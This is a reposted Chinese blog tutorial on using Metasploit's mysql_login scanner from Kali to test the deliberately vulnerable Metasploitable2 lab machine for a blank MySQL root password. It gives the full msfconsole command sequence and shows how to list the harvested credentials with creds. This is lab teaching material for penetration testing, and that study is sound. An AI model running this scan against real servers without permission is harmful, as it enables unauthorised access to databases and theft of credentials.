标签:实战篇 01 kali 数据库 Linux msf 靶机 creds
系列文章目录
实战篇 - 使用 Linux-msf 扫描 metasploitable2 靶机上MySQL服务的空密码
文章目录
前言
metasploitable 是用于评估 metasploit 的靶机,是一个 Ubuntu-Linux 虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。与VMWare、VirtualBox和其他常见的虚拟化平台兼容。
Metasploitable 默认 用户名:msfadmin, 密码:msfadmin。登陆之后使用 ip addr 可查看 ip 地址。(查看 IP 的命令很多)
有些新手学了点皮毛耗费大量时间自己去找 IP 做测试,这不仅浪费大量时间,而且很容易被请去小黑屋,有这样一个练手的环境直接去干挺好的,安装靶机也不难,省时省力只是占点内存,网上安装教程也很多。
一、实验环境
一台 Kali - Linux 和 一台 Metasploitable2-Linux 靶机。
我的靶机网络模式设置的是桥接(VMnet0)模式。
二、实验步骤
# 启动数据库:
root@kali:~# systemctl start postgresql
root@kali:~# systemctl enable postgresql #设置成开机启动数据库,我们要经常用
1. kali 启动数据库进入 msf 搜索模块
msfconsole
search mysql_login
2. 加载模块, 配置并设置参数
use auxiliary/scanner/mysql/mysql_login
set rhosts 目标主机IP
set username root #我们配置要爆破的用户
set blank_passwords true #开启为所有用户尝试空密码
show options
3. 配置完成后执行 run 或者 exploit
4. 使用后端凭证命令 creds,列出数据库中的所有凭据
creds
注:如果creds出现错误,可能是postgresql未开启!
例如:
即无活动数据库,凭证将不会被保存。查看主机信息和凭证信息,数据库未连接
标签:实战篇,01,kali,数据库,Linux,msf,靶机,creds 来源: https://blog.csdn.net/weixin_52297942/article/details/122644158
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。